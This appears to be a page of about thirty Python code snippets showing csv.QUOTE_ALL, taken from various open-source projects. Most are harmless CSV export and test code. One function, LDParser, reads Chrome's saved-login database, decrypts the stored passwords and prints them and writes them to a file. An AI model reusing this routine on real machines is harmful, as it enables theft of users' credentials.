我们从Python开源项目中,提取了以下50个代码示例,用于说明如何使用csv.QUOTE_ALL。
def create_carto_file(): """ Creates a .csv file to be uploaded into http://carto.com with the smells. """ location_finder = LocationFinder() filename = "carto.csv" csv_file = open(filename, "w", newline="") print("Output file: {}".format(filename)) map_writer = csv.writer(csv_file, delimiter=",", quoting=csv.QUOTE_ALL) map_writer.writerow(["longitude", "latitude", "date", "location_name", "number_of_smells"]) missing_locations = [] for borough_name, borough_information in smell_hits.res.items(): for year, number_of_smells in borough_information.items(): (latitude, longitude) = location_finder.lookup(borough_name) if latitude is not None and longitude is not None: date = "{}/01/01".format(year) map_writer.writerow([latitude, longitude, date, borough_name, number_of_smells]) else: if borough_name not in missing_locations: missing_locations.append(borough_name) print("Missing locations:", missing_locations)
def clean_and_write_dataframe_to_csv(data, filename): """ Cleans a dataframe of np.NaNs and saves to file via pandas.to_csv :param data: data to write to CSV :type data: :class:`pandas.DataFrame` :param filename: Path to file to write CSV to. if None, string of data will be returned :type filename: str | None :return: If the filename is None, returns the string of data. Otherwise returns None. :rtype: str | None """ # cleans np.NaN values data = data.where((pd.notnull(data)), None) # If filename=None, to_csv will return a string result = data.to_csv(path_or_buf=filename, encoding='utf-8', dtype=str, index=False, na_rep=None, skipinitialspace=True, quoting=csv.QUOTE_ALL) logging.info("Dataframe of shape %s has been stored." % str(data.shape)) return result
def LDParser(self): conn = sqlite3.connect (os.getenv("APPDATA") + "\..\Local\Google\Chrome\User Data\Default\Login Data") cursor = conn.cursor() cursor.execute('SELECT action_url, username_value, password_value FROM logins') output_file_path = 'ChromeCode/ChromeLoginData' with open(output_file_path, 'wb') as output_file: csv_writer = csv.writer(output_file, quoting=csv.QUOTE_ALL) headers = [] csv_writer.writerow(headers) for result in cursor.fetchall(): password = win32crypt.CryptUnprotectData(result[2], None, None, None, 0)[1] if password: print 'Site: ' + result[0] print 'Username: ' + result[1] print 'Password: ' + password Final_list = (('Site', result[0]) + ("\n" 'Username', result[1]) + ("\n" 'Password', password)) csv_writer.writerow(Final_list)
def HistParser(self): HistStatement = 'SELECT url FROM urls' #Basic HistoryParser pulling only urls with sqlite3.connect('C:\Users\Lewis Collins\AppData\Local\Google\Chrome\User Data\Default\History') as conn: conn.text_factory = str c = conn.cursor() output_file_path = 'ChromeCode/Chrome_Hist.csv' with open(output_file_path, 'wb') as output_file: csv_writer = csv.writer(output_file, quoting=csv.QUOTE_ALL) headers = [] csv_writer.writerow(headers) epoch = datetime(1601, 1, 1) for row in (c.execute(HistStatement)): row = list(row) csv_writer.writerow(row)
def _test_arg_valid(self, ctor, arg): self.assertRaises(TypeError, ctor) # PyPy gets an AttributeError instead of a TypeError self.assertRaises((TypeError, AttributeError), ctor, None) self.assertRaises(TypeError, ctor, arg, bad_attr = 0) self.assertRaises(TypeError, ctor, arg, delimiter = 0) self.assertRaises(TypeError, ctor, arg, delimiter = 'XX') self.assertRaises(csv.Error, ctor, arg, 'foo') self.assertRaises(TypeError, ctor, arg, delimiter=None) self.assertRaises(TypeError, ctor, arg, delimiter=1) self.assertRaises(TypeError, ctor, arg, quotechar=1) self.assertRaises(TypeError, ctor, arg, lineterminator=None) self.assertRaises(TypeError, ctor, arg, lineterminator=1) self.assertRaises(TypeError, ctor, arg, quoting=None) self.assertRaises(TypeError, ctor, arg, quoting=csv.QUOTE_ALL, quotechar='') self.assertRaises(TypeError, ctor, arg, quoting=csv.QUOTE_ALL, quotechar=None)
def _test_dialect_attrs(self, ctor, *args): # Now try with dialect-derived options class dialect: delimiter='-' doublequote=False escapechar='^' lineterminator='$' quotechar='#' quoting=csv.QUOTE_ALL skipinitialspace=True strict=False args = args + (dialect,) obj = ctor(*args) self.assertEqual(obj.dialect.delimiter, '-') self.assertEqual(obj.dialect.doublequote, False) self.assertEqual(obj.dialect.escapechar, '^') self.assertEqual(obj.dialect.lineterminator, "$") self.assertEqual(obj.dialect.quotechar, '#') self.assertEqual(obj.dialect.quoting, csv.QUOTE_ALL) self.assertEqual(obj.dialect.skipinitialspace, True) self.assertEqual(obj.dialect.strict, False)
def test_quoting(self): class mydialect(csv.Dialect): delimiter = ";" escapechar = '\\' doublequote = False skipinitialspace = True lineterminator = '\r\n' quoting = csv.QUOTE_NONE d = mydialect() mydialect.quoting = None self.assertRaises(csv.Error, mydialect) mydialect.doublequote = True mydialect.quoting = csv.QUOTE_ALL mydialect.quotechar = '"' d = mydialect() mydialect.quotechar = "''" self.assertRaises(csv.Error, mydialect) mydialect.quotechar = 4 self.assertRaises(csv.Error, mydialect)
def _test_arg_valid(self, ctor, arg): self.assertRaises(TypeError, ctor) self.assertRaises(TypeError, ctor, None) self.assertRaises(TypeError, ctor, arg, bad_attr = 0) self.assertRaises(TypeError, ctor, arg, delimiter = 0) self.assertRaises(TypeError, ctor, arg, delimiter = 'XX') self.assertRaises(csv.Error, ctor, arg, 'foo') self.assertRaises(TypeError, ctor, arg, delimiter=None) self.assertRaises(TypeError, ctor, arg, delimiter=1) self.assertRaises(TypeError, ctor, arg, quotechar=1) self.assertRaises(TypeError, ctor, arg, lineterminator=None) self.assertRaises(TypeError, ctor, arg, lineterminator=1) self.assertRaises(TypeError, ctor, arg, quoting=None) self.assertRaises(TypeError, ctor, arg, quoting=csv.QUOTE_ALL, quotechar='') self.assertRaises(TypeError, ctor, arg, quoting=csv.QUOTE_ALL, quotechar=None)
def rm_source(identnr): """removes source with input identnr :param identnr: """ source = get_sources(ident=str(identnr)) if source: source_name = source[0][1] else: return False path = CACHE_DIR + str(identnr) + "_" + source_name.replace(".", "") + '.json' all_sources = _get_all_sources_as_list() new = [x for x in all_sources if x[0] != identnr] with open(SOURCE_FLE_NAME, 'w+') as csvfile: sourcewriter = csv.writer(csvfile, delimiter=DELIMITER, quoting=csv.QUOTE_ALL) for row in new: sourcewriter.writerow(row) if os.remove(path): return True else: return False
def expand (self, db_schema, inc_tags=False, exc_tags=False, out_pth=_TEMPLATE_PTH): self.db_schema = db_schema self.inc_tags, self.exc_tags = inc_tags, exc_tags assert not (inc_tags and exc_tags), "cannot have included and excluded tags" with open (out_pth, 'w') as out_hndl: self.out_hndl = out_hndl self.csv_writer = csv.DictWriter (out_hndl, fieldnames=[x.value for x in consts.OUTPUT_COLS], extrasaction='ignore', quoting=csv.QUOTE_ALL, ) self.csv_writer.writeheader() for f in self.db_schema: self.expand_form (f)
def csv_masks(request, hashfile_id): hashfile = get_object_or_404(Hashfile, id=hashfile_id) # didn't found the correct way in pure django... res = Cracked.objects.raw("SELECT id, password_mask, COUNT(*) AS count FROM Hashcat_cracked USE INDEX (hashfileid_id_index) WHERE hashfile_id=%s GROUP BY password_mask ORDER BY count DESC", [hashfile.id]) fp = tempfile.SpooledTemporaryFile(mode='w') csvfile = csv.writer(fp, quotechar='"', quoting=csv.QUOTE_ALL) for item in res: csvfile.writerow([item.count, item.password_mask]) fp.seek(0) # rewind the file handle csvfile_data = fp.read() for query in connection.queries[-1:]: print(query["sql"]) print(query["time"]) response = HttpResponse(csvfile_data, content_type='application/force-download') # mimetype is replaced by content_type for django 1.7 response['Content-Disposition'] = 'attachment; filename=%s_masks.csv' % hashfile.name return response
def write_stock(stock_out, filtered_stock, modifications): """ Generate the new stock file with modified and created entries. We mimick the initial stock with encoding, quotes and delimiters. """ with open(stock_out, 'w', encoding='cp1252') as csv_file: _, first_row, fieldnames = next(filtered_stock) # `extrasaction` is set to `ignore` to be able to pass more keys # to the `writerow` method coming from the flux. writer = csv.DictWriter( csv_file, fieldnames=fieldnames, delimiter=';', quoting=csv.QUOTE_ALL, extrasaction='ignore') writer.writeheader() # Because we already iterate once to retrieve fieldnames. writer.writerow(first_row) # Then write the updated stock. for i, row, _ in filtered_stock: writer.writerow(row) # Finally, append creations and insertions. for siret, row in modifications.items(): is_created = row['VMAJ'] == 'C' is_inserted = row['VMAJ'] == 'D' if is_created or is_inserted: writer.writerow(row)
def write_stock(stock_out, filtered_stock): """ Generate the new stock file with filtered entries. We mimick the initial stock with encoding, quotes and delimiters. """ with open(stock_out, 'w', encoding='cp1252') as csv_file: _, first_row, fieldnames = next(filtered_stock) # `extrasaction` is set to `ignore` to be able to pass more keys # to the `writerow` method coming from the flux. writer = csv.DictWriter( csv_file, fieldnames=fieldnames, delimiter=';', quoting=csv.QUOTE_ALL, extrasaction='ignore') writer.writeheader() # Because we already iterate once to retrieve fieldnames. writer.writerow(first_row) # Then write the updated stock. for i, row, _ in filtered_stock: writer.writerow(row)
def run_rules(job_id, schema_name): meta_conn = psycopg2.connect("dbname='validator' user='testUser' host='localhost' password='testPwd'") meta_conn.set_isolation_level(ISOLATION_LEVEL_AUTOCOMMIT) meta_c = meta_conn.cursor() meta_c.execute('UPDATE jobs SET status=\'starting_rules\' WHERE job_id=%d' % job_id) conn = psycopg2.connect("dbname='job_%d' user='testUser' host='localhost' password='testPwd'" % job_id) c = conn.cursor() reader = csv.reader(open('rules/%s.csv' % schema_name, 'rb'), quotechar='"', delimiter=',', quoting=csv.QUOTE_ALL, skipinitialspace=True) header = reader.next() for row in reader: sql = row[header.index('sql')] print "Running rule %s: %s" % (row[header.index('id')], sql) c.execute(sql) invalid_count = 0 for row in c.fetchall(): invalid_count += 1 print '==> Found %d invalid rows.' % invalid_count conn.close() meta_c.execute("UPDATE jobs SET status='finished_rules' WHERE job_id=%d" % job_id) meta_conn.close()
def score_packets(input_url='data/raw_packets.csv', output_url='data/scored_packets.csv'): ''' Adds score indicators to botnets ''' print("Transforming initial data csv") with open(output_url, 'w') as raw_flows: writer = csv.writer(raw_flows, delimiter=',', quotechar='"', quoting=csv.QUOTE_ALL) with open(input_url) as csvfile: writer.writerow(headers + "Score") first = True for row in csv.reader(csvfile, delimiter=',', quotechar='"'): if first is True: first = False continue if row[headers.index('Label')] == "BENIGN": row.append(0) else: row.append(1) writer.writerow(row)
def modify_csv_rows(input_url=PROJ_ROOT+'data/data.csv', output_url=PROJ_ROOT+'data/modified_data.csv'): print("Transforming initial data csv") with open(output_url, 'w') as new: newWriter = csv.writer(new, delimiter=',', quotechar='"', quoting=csv.QUOTE_ALL) with open(input_url) as csvfile: newWriter.writerow(['Source Port', 'Destination Port', 'Eth', 'Source', 'Destination', 'Protocol', 'IP_Flags', 'Length', 'Protocols in frame', 'Time', 'tcp_Flags', 'TCP Segment Len', 'udp_Length']) first = True for row in csv.reader(csvfile, delimiter=',', quotechar='"'): if first == True: first = False continue if row[2]: row.pop(0) row.pop(0) else: row.pop(2) row.pop(2) newWriter.writerow(row) print("Csv row modification complete\n##############################")
def test_csv_export(rf, module): class CSVExport(views.AbstractCSVExportView): def get_filename(self): return 'testexport.csv' def get_header(self): return ['head1', 'head2'] def export_rows(self): return [['regular', 'delimiter,;\t '], ['escaping"\'', 'newlines\r\n']] request = rf.get('/') response = CSVExport.as_view()(request, module=module) assert response['Content-Disposition'] == 'attachment; ' \ 'filename="testexport.csv"' reader = csv.reader(response.content.decode('utf-8').splitlines(True), lineterminator='\n', quotechar='"', quoting=csv.QUOTE_ALL) lines = list(reader) assert lines[0] == ['head1', 'head2'] assert lines[1] == ['regular', 'delimiter,;\t '] assert lines[2] == ['escaping"\'', 'newlines\r\n']
def main(): parser = make_arg_parser() args = parser.parse_args() sam_files = [os.path.join(args.input, filename) for filename in os.listdir(args.input) if filename.endswith('.sam')] img_map = IMGMap() ncbi_tree = NCBITree() with open(args.output, 'w') if args.output else sys.stdout as outf: csv_outf = csv.writer(outf, quoting=csv.QUOTE_ALL, lineterminator='\n') csv_outf.writerow(['sample_id', 'sequence_id', 'ncbi_tid', 'img_id']) for file in sam_files: with open(file) as inf: lca_map = build_lca_map(yield_alignments_from_sam_inf(inf), ncbi_tree, img_map) for key in lca_map: img_ids, ncbi_tid = lca_map[key] csv_outf.writerow([os.path.basename(file)[:-4], key, ncbi_tid, ','.join(img_ids)])
def get(self): cached = memcache.get('best_handler') if cached: self.response.out.write(cached) else: response_writer = csv.writer( self.response, delimiter=',', quoting=csv.QUOTE_ALL) # Instruct endpoint to cache for 1 day. self.response.headers['Cache-control'] = 'public, max-age=86400' for line in ndb.gql( 'select distinct screen_name, twitter_id, score ' 'from Score order by score limit 20000'): response_writer.writerow( [line.screen_name, line.twitter_id, line.score]) memcache.set('best_handler', self.response.text, 86400)
def get(self): cached = memcache.get('worst_handler') if cached: self.response.out.write(cached) else: response_writer = csv.writer( self.response, delimiter=',', quoting=csv.QUOTE_ALL) # Instruct endpoint to cache for 1 day. self.response.headers['Cache-control'] = 'public, max-age=86400' # Using GQL as a test - will create new index for line in ndb.gql( 'select distinct screen_name, twitter_id, score ' 'from Score order by score desc limit 20000'): response_writer.writerow( [line.screen_name, line.twitter_id, line.score]) memcache.set('worst_handler', self.response.text, 86400)
def get(self): cached = memcache.get('worst_hashtags') if cached: self.response.out.write(cached) else: response_writer = csv.writer( self.response, delimiter=',', quoting=csv.QUOTE_ALL) # Instruct endpoint to cache for 1 day. self.response.headers['Cache-control'] = 'public, max-age=86400' c = Counter() for s in Score.query().order(-Score.score).iter( limit=5000, projection=(Score.hashtags)): if s.hashtags is not None: c.update((h.lower() for h in s.hashtags)) for tag, tag_count in c.most_common(100): response_writer.writerow( [tag, tag_count]) memcache.set('worst_hashtags', self.response.text, 86400)
def get(self): cached = memcache.get('worst_websitess') if cached: self.response.out.write(cached) else: response_writer = csv.writer( self.response, delimiter=',', quoting=csv.QUOTE_ALL) # Instruct endpoint to cache for 1 day. self.response.headers['Cache-control'] = 'public, max-age=86400' c = Counter() for s in Score.query().order(-Score.score).iter( limit=5000, projection=(Score.websites)): if s.websites is not None: c.update((h.lower() for h in s.websites)) for site, site_count in c.most_common(200): response_writer.writerow( [site, site_count]) memcache.set('worst_websitess', self.response.text, 86400)
def get(self): cached = memcache.get('worst_unknown_websites') if cached: self.response.out.write(cached) else: response_writer = csv.writer( self.response, delimiter=',', quoting=csv.QUOTE_ALL) # Instruct endpoint to cache for 1 day. self.response.headers['Cache-control'] = 'public, max-age=86400' c = Counter() for s in Score.query().order(-Score.score).iter( limit=5000, projection=(Score.websites)): if s.websites is not None: c.update((h.lower() for h in s.websites if h.lower() not in c('KNOWN_SITES'))) for site, site_count in c.most_common(200): response_writer.writerow( [site, site_count]) memcache.set('worst_unknown_websites', self.response.text, 86400)
def read_table(zip_file, table_name, columns, dtypes=None): if not dtypes: dtypes = {} with zip_file.open(table_name + '.txt', 'r') as csv_stream: hearer = csv_stream.readline().strip() names = [ GET_COLUMN_NAME_REGEX.sub(b'', name).decode('ascii') for name in hearer.split(b',')] table = pandas.read_csv( csv_stream, names=names, quotechar='"', quoting=csv.QUOTE_ALL, usecols=[col for col in columns]) table = [ numpy.asarray(remove_nans(table[column]), dtype=dtypes.get(column)) for column in columns] return table
def gen_csv(csvfile, page_list): # Define writer writer = csv.writer(csvfile, quoting=csv.QUOTE_ALL) # Field names field_names = ['PageID', 'DescriptionURL', 'ImageURL', 'ImageSHA1', 'PixelHeight', 'PixelWidth', 'PaintingID', 'Artist', 'RealDimensions'] writer.writerow(field_names) # For each image for page in page_list: writer.writerow([page.page_id, page.description_url, page.img_url, page.img_sha1, page.img_height, page.img_width, page.paint_id, page.artist, page.dim]) # Main
def get_csv_writer_fmtparams(self): return { 'dialect': 'excel', 'quoting': csv.QUOTE_ALL, }
def write_dict_to_csv(list_of_dictionaries, output_file): """write a list of dictionaries to a csv file.""" fieldnames = ['centroid_lon', 'centroid_lat', 'feature_type', 'name', 'source'] with open(output_file, 'w', newline = '') as f: w = csv.DictWriter(f, fieldnames, quoting = csv.QUOTE_ALL) w.writeheader() w.writerows(list_of_dictionaries)
def write_to_csv(received_data = [], *args): first_data = ["Company", "Last Traded Price", "Change", "Total Listed Shares", "Paid Up Value", "Total Paid Up Value", "Closing Market Price", "Market Capitalization"] if os.path.isfile("datafile.csv"): with open("datafile.csv", "a") as output: writer = csv.writer(output, quoting=csv.QUOTE_ALL) writer.writerow(received_data) received_data[:] = [] else: with open("datafile.csv", "w") as output: writer = csv.writer(output, quoting=csv.QUOTE_ALL) writer.writerow(first_data) writer.writerow(received_data) received_data[:] = []
def module_run(self): filename = self.options['filename'] # codecs module not used because the csv module converts to ascii with open(filename, 'w') as outfile: # build a list of table names table = self.options['table'] rows = self.query('SELECT * FROM "%s" ORDER BY 1' % (table)) cnt = 0 for row in rows: row = [x if x else '' for x in row] if any(row): cnt += 1 csvwriter = csv.writer(outfile, quoting=csv.QUOTE_ALL) csvwriter.writerow([s.encode("utf-8") for s in row]) self.output('%d records added to \'%s\'.' % (cnt, filename))
def write_csv_file(filename, result, path): """Writes the result to csv with the given filename. Args: filename (str): Filename to write to. path (str): Directory path to use. """ output = open(path + filename + '.csv', 'wb') writer = csv.writer(output, quoting=csv.QUOTE_ALL, lineterminator='\n') for val in result: writer.writerow([val]) # Print one a single row # writer.writerow(result)
def execute(self, statement): execution_id = self.athena.start_query_execution(self.dbname, statement) if not execution_id: return while True: stats = self.athena.get_query_execution(execution_id) status = stats['QueryExecution']['Status']['State'] if status in ['SUCCEEDED', 'FAILED', 'CANCELLED']: break time.sleep(0.2) # 200ms if status == 'SUCCEEDED': results = self.athena.get_query_results(execution_id) headers = [h['Name'].encode("utf-8") for h in results['ResultSet']['ResultSetMetadata']['ColumnInfo']] if self.format in ['CSV', 'CSV_HEADER']: csv_writer = csv.writer(sys.stdout, quoting=csv.QUOTE_ALL) if self.format == 'CSV_HEADER': csv_writer.writerow(headers) csv_writer.writerows([[text.encode("utf-8") for text in row] for row in self.athena.yield_rows(results, headers)]) elif self.format == 'TSV': print(tabulate([row for row in self.athena.yield_rows(results, headers)], tablefmt='tsv')) elif self.format == 'TSV_HEADER': print(tabulate([row for row in self.athena.yield_rows(results, headers)], headers=headers, tablefmt='tsv')) elif self.format == 'VERTICAL': for num, row in enumerate(self.athena.yield_rows(results, headers)): print('--[RECORD {}]--'.format(num+1)) print(tabulate(zip(*[headers, row]), tablefmt='presto')) else: # ALIGNED print(tabulate([x for x in self.athena.yield_rows(results, headers)], headers=headers, tablefmt='presto')) if status == 'FAILED': print(stats['QueryExecution']['Status']['StateChangeReason'])
def Y_Output(): mylist = [1,1,0,0,1,1,1,1,0,1,1,0,1,1,1,0,0,1,0,0,1,1,1,1,0] myfile = open("sandeep_Y.csv", 'wb') wr = csv.writer(myfile, quoting=csv.QUOTE_ALL) wr.writerow(mylist) with open('prakhar_Y.csv', 'rb') as csvfile: spamreader = csv.reader(csvfile) for row in spamreader: print row
def test_write_quoting(self): self._write_test(['a',1,'p,q'], 'a,1,"p,q"') self.assertRaises(csv.Error, self._write_test, ['a',1,'p,q'], 'a,1,p,q', quoting = csv.QUOTE_NONE) self._write_test(['a',1,'p,q'], 'a,1,"p,q"', quoting = csv.QUOTE_MINIMAL) self._write_test(['a',1,'p,q'], '"a",1,"p,q"', quoting = csv.QUOTE_NONNUMERIC) self._write_test(['a',1,'p,q'], '"a","1","p,q"', quoting = csv.QUOTE_ALL) self._write_test(['a\nb',1], '"a\nb","1"', quoting = csv.QUOTE_ALL)
def test_write_quoting(self): self._write_test(['a',1,'p,q'], 'a,1,"p,q"') self._write_error_test(csv.Error, ['a',1,'p,q'], quoting = csv.QUOTE_NONE) self._write_test(['a',1,'p,q'], 'a,1,"p,q"', quoting = csv.QUOTE_MINIMAL) self._write_test(['a',1,'p,q'], '"a",1,"p,q"', quoting = csv.QUOTE_NONNUMERIC) self._write_test(['a',1,'p,q'], '"a","1","p,q"', quoting = csv.QUOTE_ALL) self._write_test(['a\nb',1], '"a\nb","1"', quoting = csv.QUOTE_ALL)
def test_quoting(self): class mydialect(csv.Dialect): delimiter = ";" escapechar = '\\' doublequote = False skipinitialspace = True lineterminator = '\r\n' quoting = csv.QUOTE_NONE d = mydialect() self.assertEqual(d.quoting, csv.QUOTE_NONE) mydialect.quoting = None self.assertRaises(csv.Error, mydialect) mydialect.doublequote = True mydialect.quoting = csv.QUOTE_ALL mydialect.quotechar = '"' d = mydialect() self.assertEqual(d.quoting, csv.QUOTE_ALL) self.assertEqual(d.quotechar, '"') self.assertTrue(d.doublequote) mydialect.quotechar = "''" with self.assertRaises(csv.Error) as cm: mydialect() self.assertEqual(str(cm.exception), '"quotechar" must be an 1-character string') mydialect.quotechar = 4 with self.assertRaises(csv.Error) as cm: mydialect() self.assertEqual(str(cm.exception), '"quotechar" must be string, not int')
def __create_stocklist(self): """???????CSV???????????? Returns: ???????????????????????? """ def get_row(idx): """CSV????1???????????""" return ('TEST{}'.format(idx), 'Test {}'.format(idx), 'Sector {}'.format(idx % 10),) header = ('Symbol', 'Name', 'Sector',) num_markets = len(const.MARKET_DATA.keys()) lis = [[ get_row(idx2) for idx2, row in enumerate(range(self.num_stocks)) if idx2 % num_markets == idx1 ] for idx1 in range(len(const.MARKET_DATA.keys()))] for idx, (market_id, market_name) in enumerate(const.MARKET_DATA.items()): with open(os.path.join(self.dest_dir_stocklist, market_name + '.csv'), 'w', encoding=const.DEFAULT_FILE_ENCODING, newline='') as fp: writer = csv.writer(fp, quoting=csv.QUOTE_ALL) writer.writerow(header) writer.writerows(lis[idx]) return [row[0] for row in chain(*lis)] # Symbol??????????